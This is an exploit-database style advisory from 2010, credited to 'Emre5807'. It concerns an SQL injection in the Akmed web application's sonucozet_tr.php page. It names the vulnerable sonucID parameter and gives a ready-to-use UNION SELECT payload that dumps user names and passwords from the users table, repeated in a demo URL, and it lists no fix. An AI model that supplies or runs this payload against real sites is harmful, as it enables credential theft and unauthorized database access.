Akmed (sonucozet_tr.php sonucID) SQL Injection Vulnerability

2010-05-14 20:02:03

===========================================================
Akmed ( sonucozet_tr.php ) SQL Injection Vulnerability
===========================================================

###########################

Author : Emre5807

Homepage : http://www.1923turk.com /// 1923Turk-Grup ///


###########################

[ Vulnerable File ]


Site.com/sonucozet_tr.php?sonucID= [ SQL ]



[ Exploit ]

+union+select+1,2,3,group_concat(name,7,pass),5,6,7,8,9,10,11+from+users


[ Demo]

http://xxxxx.com/sonucozet_tr.php?sonucID=-101+union+select+1,2,3,group_concat(name,7,pass),5,6,7,8,9,10,11+from+users


#############################################################################################################
# Greetz: CodeS -

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.